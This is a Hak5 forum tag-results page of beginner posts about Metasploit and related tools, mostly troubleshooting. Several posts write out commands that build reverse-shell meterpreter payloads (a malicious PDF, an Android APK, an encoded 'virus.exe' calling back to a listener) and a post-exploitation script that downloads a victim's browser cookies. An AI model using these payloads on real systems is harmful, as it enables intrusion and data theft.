Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hello guys, i wanted to use the Adobe PDF Embedded Exe NOJS Exploit (use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) on my Ubuntu Server where i installed Metasploit. After setting up the exploit: Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 85.214.XX.XX Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename file.pdf Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit I used for localhost my Server IP Adress, in case to make a real-world pentesting. After that, setting up the multi handler to get the reverse connection: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 85.214.XX.XX exploit I sent the PDF file to my virtual machine, Windows 7. I run the PDF file, but i didn't get the reverse connection - i didnt received a connection on metasploit. What am I doing wrong ? A log of my server: Linux 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Thank you guys.
  2. Hi guys, I recently started learning more about ethical hacking and stumbled upon metasploit. It is a great tool but I am having an issue on a pen test, which is the following. I am trying to exploit my IPad Air- IOS 8.1.1 Jailbroken and I am using the exploit "exploit/apple_ios/ssh/cydia_default_ssh". Also the OS I am running is Kali Linux. I am able to setup the RHOST with my IP Address ( and the default port 22. This data is confirmed and accurate as I did a nmap scan just before that showed me that the port 22 was open on that IP. Everything seems fine until i try to run the exploit, what happens is this: [*] - Attempt to login as 'root' with password 'alpine' [-] SSH Error: Net::SSH::Exception : could not settle on kex algorithm [*] - Attempt to login as 'mobile' with password 'dottie' [-] SSH Error: Net::SSH::Exception : could not settle on kex algorithm I have left the root:alpine login as per default in my ipad. I had even changed the password in my Ipad's terminal and tried to login via Armitage with SSH Login and the updated credentials. Still, I am always getting the same error and not sure what is going on. Can anyone help here? Cheers
  3. Hey! Tested on the iPhone 4 running Ios 7 jail broken by using evasion7 I wanted to talk about using a iDevice (ios 7)as a pen testing device . [ Noob Friendly ] First off , why should you use a iDevice as a pen testing device ? Its portable Not noticeable it looks cool :) its pretty fast IOS == Unix It can easily be used with the pineapple ;) Let's move on , so how do you make your iDevice into a pentesting device ? First you need jailbreak your iDevice (eg ; Evasion7) Open Cydia Adding repositories by going to "Manage" and then "Sources" and then "edit" and then "add" Then add all these repositories :: http://cydia.myrepospace.com/Boo/ http://ininjas.com/repo/ http://cydia.xsellize.com/ When that's done . click on "http://ininjas.com/repo/" and scroll down until you see "Metasploit" then click on "Metasploit" and then click on "edit" and then click on "Install" When that's done go back and scroll until you see "Aircrack-ng" and the click on it and install just like previous when thats done install Auto Reconnect , Mobile terminal ,beEF, CUPP, Dsniff Suite , dsniff-fr0g , Ettercap-ng GTk , Ettercap No GTK , Evil Grade ,iAHT, iPwN ,John the Ripper, Low Orbit Ion Cannon , NBTScan, Nikto2, Nmap , Pirni ,Ruby 1.8.6 , Searchsploit , SSLstrip , Wordlists , XSSer , xterm , IWep , SET (not the one thats called Social Engineering Toolkit but the one thats called SET!!) , OpenSSH ! , iSSH I know that are alot of tools and it will take you some time but when its done you have an awesome pentesting device ! When you Installed all those Tools open Mobile terminal or xterm and type "su" and fill in your password "standard password is :: alpine " then type cd /pentest and there are all your tools . Make sure you go to /pentest/exploits/SET/config and open the set_config and change the metasploit path to the path where metasploit is instaleld. If you need help setting up the other tools (should work fine) or if you have any problems feel free to leave them below . Enjoy your simple but powerful pen testing device ;) Merry Christmas! :) - Jesse
  4. http://i.imgur.com/xQuF9Fq.jpg http://i.imgur.com/RAtlIVl.jpg awus036nha v5 anker 15000 mah raspberry pi b+ 2 amp usb hub im at about 135$ so far (money i have made with tips during work hours) i had the pi plugged into 1amp and usb-hub+alfa-card plugged into 2 amp power supply and seems to run just fine... (fails other way around, alfa card needs 2 amps or disconnect/reconnect happens) the video above, i add this to my /etc/rc.local --> ./mana/run-mana/start-noupstream.sh with eth0 as the out interface, i have seen this thing go for 12 hours with out any dmesg errors... (./start-nat-simple.sh) i plan to get a nother alfa card for a good out interface... its ugly, at the moment, i plan to clean it up...
  5. hi when i try run this in a command terminal on my vmware kali box i get some message about using msfvenom can someone please turn my code into msfvenom code or whatever i need to make this work for android and armitage. thanks msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=8080 R > nsf-2.apk
  6. i want to test and demo pwning of mobile devices such as Android and iOS. i googled a lot and found a recent example: https://www.youtube.com/watch?v=TbyQoWyaw2g can i achieve the same thing using Pineapple only? right now i am trying to get Kali machine + beef + metasploit working with that module without success (that specific vulnerability). i found in the forum there's something named JasagerPwn that contains beef: https://forums.hak5.org/index.php?showtopic=30588 but don't know if this is an updated infusion or if it was replaced with other infusion. bottom line - is there an infusion or setup with Pineapple that can operate beef against browsers of mobile devices and let me run exploits and to be specific the UXSS demo shown in the movie? will be happy to get your inputs and redirection what is the needed setup i need to focus on? more general questions - what else do you think i can demo on mobile phones/browsers? keylogger? i am looking for something with an affect - visual or sound that can be an action i decide what is the timing (not redirecting to a page that will play wav file). thank you very much! pineapple is so cool - can't wait to understand how deep i can use it
  7. Hello there fellow hackers/netizens I have installed Kali Linux on Virtual Box on Windows and it's running fine. I'd like to learn more about hacking and how I can protect myself from such attacks. So to start with, I've loaded a pdf with a meterpreter reverse tcp payload on metasploit and the target has downloaded it and opened the file. How do I know if meterpreter is running in the target computer ? Is there anything I have to do on my end to start the installation ? And I can't seem to get the meterpreter> prompt no matter what I do on the terminal. Need beginner's level help if any of you have to know-how and are willing to guide me. Many Thanks in advance
  8. Hello, does anyone here have similar issue with Metasploit? Error message: [FAIL] Postgresql must be started before Metasploit ... failed! root@kali:~# service metasploit status [FAIL] Metasploit rpc server is not running ... failed! [FAIL] Metasploit web server is not running ... failed! [FAIL] Metasploit worker is not running ... failed! root@kali:~# root@kali:~# service metasploit start [FAIL] Postgresql must be started before Metasploit ... failed! root@kali:~# root@kali:~# msfconsole [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host "localhost" ( and accepting TCP/IP connections on port 5432? +-------------------------------------------------------+ | METASPLOIT by Rapid7 | +---------------------------+---------------------------+ | __________________ | | | ==c(______(o(______(_() | |""""""""""""|======[*** | | )=\ | | EXPLOIT \ | | // \\ | |_____________\_______ | | // \\ | |==[msf >]============\ | | // \\ | |______________________\ | | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ | | // \\ | ********************* | +---------------------------+---------------------------+ | o O o | \'\/\/\/'/ | | o O | )======( | | o | .' LOOT '. | | |^^^^^^^^^^^^^^|l___ | / _||__ \ | | | PAYLOAD |""\___, | / (_||_ \ | | |________________|__|)__| | | __||_) | | | |(@)(@)"""**|(@)(@)**|(@) | " || " | | = = = = = = = = = = = = | '--------------' | +---------------------------+---------------------------+ Trouble managing data? List, sort, group, tag and search your pentest data in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.10.0-2014092602 [core:4.10.0.pre.2014092602 api:1.0.0]] + -- --=[ 1346 exploits - 741 auxiliary - 217 post ] + -- --=[ 340 payloads - 35 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > msf > search name:oracle [!] Database not connected or cache not built, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/oracle/ora_ntlm_stealer 2009-04-07 normal Oracle SMB Relay Code Execution auxiliary/admin/oracle/oracle_login 2008-11-20 normal Oracle Account Discovery auxiliary/admin/oracle/oracle_sql 2007-12-07 normal Oracle SQL Generic Query auxiliary/admin/oracle/oraenum normal Oracle Database Enumeration .... Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow exploit/windows/oracle/tns_service_name 2002-05-27 good Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow msf > root@kali:~# uname -r 3.14-kali1-amd64 root@kali:~# Thank you for any help, it is greatly appreciated.
  9. Hi - thanks in advance to any decent folk for looking at this. If anyone with knowledge can assist I'd be grateful. I'm on windows 8.1 and recently discovered I'd been hacked using metasploit and meterpreter. I won't go into the tedious details of it all, but my whole system is now stuffed. It will need replacement. I am 100% certain the attack originated from a person I live with. He was hooked up to my wifi and was on the network. He occassionally had physical access to my PC. My problem is how do I prove it. Can anyone tell me if there is any fairly failproof way of determining if these hacking tools are or were on his Mac? I did a basic check and couldn't seem to find much, however I am a mac ignoramus so unless it was listed in programs I wouldn't have found it anyhow. I can occassionally access his Mac when he is out. I only want to determine if he was the source of the hack. I have no interest in anything else on his system. If anyone can help me in any way at all, please let me know. Cheers and thanks
  10. Hey, this is my first post here, sorry for the question but I was just wondering if I could get a nudge in the right direction. My target would of course be aware of what I was doing and I would have their full permission but I was wondering how I would go about connecting to a remote host and not a local one as I have only ever experimented with local machines. Thanks in advance!
  11. Hi guys, On my blog I wrote a post about MitM attack using SSLStrip + arpspoof. It's in Italian so I don't know if u can undestand: http://www.gianlucaghettini.net/intercettazione-traffico-https-e-recupero-dati-sensibili/ Other than the actual attack (which is very well known) I focused on the HSTS policy and how it is useful to prevent such attacks. Do you known any successful attempt to break such security policy? Poisoning the DNS cache of the target host could lead to a scenario in which the target browser goes to a fake domain, receive a forged HTTP header with a max-age value of zero: Strict-Transport-Security: max-age=0; includeSubDomains and then get redirected to the real site. The HSTS RFC says that browser SHOULD ignore the HSTS header when in HTTP mode but maybe this very specific check was not implemented on all browser.
  12. So I have been having this problem for like a week now and I can't figure out why. The problem is that when ever I try to start up a session of Metasploit or Armitage it gives me a error message saying that it couldn't connect to the database! Armitage's Error Message Could not connect to database. Click Help button for troubleshooting help. Connection refused Check that the hostname and port are correct and that the postmaster is accepting TCP/IP connections. Metasploit Error Message Failed to connect to database: Could not connect to server: Connection Refused If anyone could give me some suggestions on how to fix it I would be very grateful! If any more information is needed please tell me!
  13. Hey guys, So i have a little problem which i do not know how to solve. The problem is that when i encode my payload with x86/shikata_ga_nai and i try it on my windows pc it says it cannot run on the os this is what i typed msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe did i do something wrong , i tested it on win 8 , win 7 and win xp and it says cannot open on every system :( Does someone know the solution Thank you,
  14. Hi, Complete beginner with Metasploit, so please be gentle! I noticed that the enum_ie module doesn't work for Windows 8 clients so was trying to put a script together to download the cookie files in our test environment. I figured it would be a pretty simple exercise in learning my way around the scripting and exploring post exploitation automation as I wanted to include the script as part of the AutoRunScript rc file. When I run the script in a meterpreter session, I get absolutely no output and I am sure that I am missing something obvious but googling hasn't thrown up anything that I can see. Here is my script : require 'msf/core' require 'msf/core/post/file' class Metasploit3 < Msf::Post include Msf::Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Find Windows Cookies', 'Description' => %q{ This POST module attempts to download Windows 7 or 8 cookies }, 'License' => MSF_LICENSE, 'Author' => [ '-=bb=- ' ], 'Version' => '$Revision: 1.0 $', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run begin base = session.fs.file.expand_path("%USERPROFILE%") location << base + "\\AppData\\Local\\Microsoft\\Windows\\InetCookies" #windows 8 target = client.sys.config.sysinfo["Computer"] file_type = "*.txt*" dump = "/tmp" dump = dump + target print_status("") print_status("\tSearching for and downloading cookies...") print_status("") getfile = client.fs.file.search(location,file_type,recurse=true,timeout=-1) getfile.each do |file| print_status("Found #{file['path']}\\#{file['name']}...Saving in - #{dump}") client.fs.file.download(dump, "#{file['path']}\\#{file['name']}") end end end end Could anybody point out what bone-headedness I'm performing wrong? Many thanks in advance
  15. Just noticed that there's no reverse dns or https meterpreters for linux why is that is it not possible?
  16. Hello everyone, So I got my Pineapple Mark V and I was trying to use the dns_spoof with the SET on my Kali machine. Here is my scenario: I have the dns_spoof infusion on my MKV running with the line: * (Kali Machine's IP address ) And on my Kali i have SET running a java applet attack on If i go to my victim PC(, for example) and I type the IP on my browser I get to the SET page. However the Dns Spoof doesn't seem to be spoofing any website to the IP. If i were to browse to www.google.com I just get a blank page. Is there any other configuration I'm missing? Thank you, Joe Almeida
  17. Dear Hak5ers, Apologies if this has been discussed, I only went a few pages in to see. So what I'm goofing with is the whole isolation proxy thing, using whonix-gateway in a VM (couldn't build successfully on my extra physical box). I followed the basic guide provided by them just to get er up and running. I'm a vmware man myself, but some extra work involved so went with the suggest virtualbox. So the guide suggest the following (actually a mix of two) vm #1 - the Whonix gateway. It has 2 NIC's : one is NAT so we can reach out on the net to TOR, second is an internal (called whonix) running on by default vm#2 - kali (not whonix-workstation) with one NIC (the internal one called whonix) running on So what's my beef? Well, a lot works in terms of tunneling everything through the whonix gateway, which is essentially the goold ole' "how to route everything through tor" debate. But the one item I'm trying to tinker with is getting metasploit to behave. Which it doesn't by default. What happens is (bear in mind this is through Armitage) regardless of the IP(s) you enter for testing, they all A) basically say every bloody port is open, and B) just to get things moving, I used a known vulnerable VM to see how exploits got handled in all this routing. Well, not to smooth. Basically they EOF over and over, so you'll see the box pop (turn red and lightning) then just die (End of File). Before I start pulling hair and messing with routing tables, and most importantly, mucking the whonix gateway which I shouldn't really touch to mouch, wanted to run this scenario buy you guys. See if anyone has tried this out, worked/not worked etc etc. Would love to work this one out with some discussion. Thoughts?
  18. Hey guys, So the question I have is regarding pivots and what I'm assuming is going to come down to the 'route add' command on kali. Here's the scenario: Attack machine = (which is assigned through tap0 from a vpn connection) Also, the vpn connection above, automatically attaches me to a 192.168.15.* network Target network 1 = 192.168.15.* range mentioned above. Target network 2= 10.1.1.* One of the machine on target network 1 has been compromised and i've pivoted through metasploit to launch new attacks at target network 2, because this compromised machine is attached to target network 2. So that's not a problem. What I'm trying to figure out, is how to route everything through this pivot, outside of metasploit. With the MSF pivot, I can only use whats inside metasploit, as I'd like to be able to recon this new network using general means. I tried a couple route add commands, but I'm definitely not doing it right. Any help would be much appreciated. Just to sum up simply: me = ---> 192.168.15.* (vpn conn on tap0) target net 1 = 192.168.15.* target net 2 = 10.1.1.* need 'me' to pivot through 'target net 1' to reach 'target net 2'
  19. I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!
  20. Hello everyone, I've been working on a very small project related to Android Operating System and one of the available exploits on metasploit called android_htmlfileprovider. With this simple tool, mixed with just a bit of social engineering, you apparently are able to obtain any files from the victim's android device (only if you already know the file's absolute path on the device). The thing is, even though I'm able to retrieve regular txt files (containing nothing but plain text) I am not able to gather files with extension .db which actually contain sensitive information like browser's passwords, contacts data, etc. I believe this has something to do with special characters included on these .db files. I mean, when opening them with a regular text editor, a lot of special characters can be seen: I'm not completely sure about this, though. I'm also using a rooted AVD (Nexus One) with an old Android Version (2.2) as this exploit will only work with this version (or an older one). I would really apreciate if someone could help me out on this one. Thank you.
  21. I'm running Ubuntu 12.04 and have been trying to get Armitage running correctly so I can learn and advance to more advanced methods. I got Metasploit installed just fine, but when I try to execute armitage I get the error "line 1: java: command not found" and nothing happens. What should I do from here to get it to work?
  22. Is this possible? I know that metasploit has the ability to write custom keyloggers but I don't know much about it and I've gotta update my boss later today. Basically, there's some vendor we pay a ton of money to write and utilize a runtime DLL, which captures events like when a window opens/closes, gains focus or loses focus, etc. Turns outt he vendor is a evil, obstructive, insulting, and generally useless company that causes us non-stop problems. I said that it's probably possible to accomplish the same thing we a custom written keylogger from Metasploit. Hopefully it is possible and if so, then hopefully we can output the data to SQL Server for statistical analysis and storage. If anyone knows how to do any part of that then please let me know. I don't have to actually do all this today, I just have to say if it's possible and if so then kind of show how it would work. I'll try to actually accomplish it though. If anyone can help you'll be my hero!!!! UPDATE: Sorry for the garbled message. Stupid iPad.
  23. Hi, my question is how do we setup the metasplio(armitage) to work with the pineapple, ive seen some images of the cobalt strike with pineapple but it doesnt say how to set it up, can some one help me please, i have the newest pineapple mark IV
  24. I am trying to exploit CVE-2012-1823 using metasploit exploit exploit/multi/http/php_cgi_arg_injection.as soon i try to exploit i get an error : Exploit failed: NoMethodError undefined method `gsub' for #<URI::Generic:0xc6006a8 URL:/> please help!!!
  25. I have scanned for vulnerabilities with nessus, and i found this (PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow). So i went to the www.exploit-db.com/exploits/19231/ where it is Exploit Code written in python, i tried to use it with metasploit+armitage. But i don't know how to load the script in the existing database on my pc, i am using windows 7, and the "victim" is not on local network, i am new to this so i need some help. Also i am asking for some tutorials, or useful links where can i learn new things.
  • Create New...